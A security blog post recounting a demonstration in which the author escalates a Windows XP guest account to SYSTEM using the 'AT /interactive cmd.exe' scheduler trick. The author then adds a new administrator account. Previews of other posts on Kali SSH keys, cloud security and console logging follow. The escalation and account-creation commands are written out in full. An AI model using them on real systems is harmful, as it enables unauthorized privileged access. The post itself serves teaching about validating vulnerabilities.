Security Testing for entities hosted in cloud

For the applications that are getting migrated to cloud / planned to be hosted in the cloud will need additional security considerations. Failure to ensure proper security protection when using cloud services may potentially result in higher costs and loss to business. Organizations must consider security controls for different services viz. Infrastructures as a service(Iaas), Software as a service (SaaS) or Platform as a service. Which applications should be moved to cloud?     ·         Low to Medium Risk What are the key security risks while hosting in cloud?     ·         Isolation Failure – Multi tenancy is a key thing in cloud. Failure in controls that separate the storage, memory, identity and access control and routing between tenants is a huge risk.     ·         Authentication and Authorization     ·...
Post a Comment

OK! If you say Windows XP is so Damn Vulnerable….I give you a guest access on a XP system – Can you Hack this and get Admin Privileges?

Guest to Admin (NT Authority) on Windows XP.
It was during December 2013 when i was on my yearly holiday break and I visited my friend’s place. I visited my friend at his office – He is the ISO (Information Security Officer) for his company a SMB.

He invited me to a discussion where 2 security consultants from a vendor were to visit them to consult them on migrating to Windows 7 from XP. The consultant started with mentioning that Windows XP is very insecure and easily hackable, even kids can hack it and will soon be out of support. Then he continued telling about windows 7.

I mean all of us know that this is obvious that win XP is soon going to be out of support and Win 7 is a much secure system. I was getting bored. But my friend all of a sudden posted a question to the security consultants: “I do not believe in the stories that are going around. I give you a windows XP system and a Guest access – Can you prove this is hackable?”



That caught my attention and I suddenly respected him more. He was trying to test the capability of the consultants and if they can walk the talk.
The 2 security consultants were taken aback momentarily. One of them gathered himself back quickly and said yes there are many ways in which we can do it. But we have not got our tools with us.

My friend quickly offered to provide the required tools.. And the vendor responded by saying “This will be POC and that is chargeable sir”
My friend asked him to come back with a quote for the same. I was feeling bad about this situation as to why we cannot walk the talk. Although i do not understand the financials for businesses very well but I was him I wouldn’t mind doing a small free demo on the spot to prove my point.

Since I was an EX employee for that company where my friend is ISO He managed to convenience his colleagues for Me to do the demo.
So i was given a XP box and a guest account at 13:25
I logged in as a guest and fired command prompt and typed the following command.

AT 13:30 /interactive “C:\windows\system32\cmd.exe “
and hit enter.

So at 13:30 the System command prompt started as “nt authority”
And i had the highest privileges on the system !!!
What followed next in the quick demo was to add another user to the system and add this user to the Administrators group.
net user /add G0tD4un1k Passw00rD!
User created successfully.
net localgroup administrators G0tD4un1k /add
User added to administrators group successfully.
Game over.
I handed over the laptop back and asked to login as the new user….
This was an easy task for me. However this made me realize that we often miss to walk the talk.

Note2Self: Make sure we know how we prove a system is vulnerable if we report it as vulnerable.

Although it sounds very obvious however it has been observed many times that folks report a vulnerability straight from the vulnerability scanner
and what follows is sometimes an embarrassing discussion. We should be extra careful while reporting the vulnerabilities from a VA scanner. We should always validate the findings manually and then gauge the probability of that vulnerability being exploited before we report it as Critical.

Comments

Post a Comment

Popular posts from this blog

Change the default SSH keys in Kali Linux ......One important step post installation

All of know that we can authenticate to a box without password if you have the SSH keys. The Kali images have known ssh keys and must be changed.  Here is how you can do this:  Move the default Kali ssh keys to a new folder: cd /etc/ssh/ mkdir default_kali_keys mv ssh_host_* default_kali_keys/ This will move your default keys to the new folder... Regenerate the keys: dpkg-reconfigure openssh-server Creating SSH2 RSA key; this may take some time ... Creating SSH2 DSA key; this may take some time ... Creating SSH2 ECDSA key; this may take some time ... insserv: warning: current start runlevel(s) (empty) of script `ssh' overrides LSB defaults (2 3 4 5). insserv: warning: current stop runlevel(s) (2 3 4 5) of script `ssh' overrides LSB defaults (empty). Verify ssh key hashes are different: md5sum ssh_host_* Compare new key hashes to the hashes below) cd default_kali_keys/ md5sum * b9419ea3a8fff086c258740e89ca86b8 ssh_host_dsa_key f9a5b57d7004e3740d07c5b037d15730 ssh_host_dsa_key.p...
Read more

Security Testing for entities hosted in cloud

For the applications that are getting migrated to cloud / planned to be hosted in the cloud will need additional security considerations. Failure to ensure proper security protection when using cloud services may potentially result in higher costs and loss to business. Organizations must consider security controls for different services viz. Infrastructures as a service(Iaas), Software as a service (SaaS) or Platform as a service. Which applications should be moved to cloud?     ·         Low to Medium Risk What are the key security risks while hosting in cloud?     ·         Isolation Failure – Multi tenancy is a key thing in cloud. Failure in controls that separate the storage, memory, identity and access control and routing between tenants is a huge risk.     ·         Authentication and Authorization     ·...
Read more

Keeping logs of your console commands during pentesting

Image
While it is very important to keep the screenshots and the results of your tools logged and recorded correctly, consistently and extensively, it is equally important to keep your console logs. This is very helpful when you are done with your penetration test and recall later during the results analysis / report writing that - what was the result of 'that' command I ran??? It is very commonly missed out by most pentesters - at least the beginners. While there are many ways in which you can do this: 1] copy paste the console logs and save it in your fav text editor 2] use a systematic approach I am sure method [1] is known to all :) Let's learn method [2] - Use script yes there is in inbuilt tool / script in linux that you can make use of: script usage: script filename.log This will start a process and it will keep logging the console output to this file. Once you are done just 'exit' Not to mention that care must be taken that you do not exit this process in between ...
Read more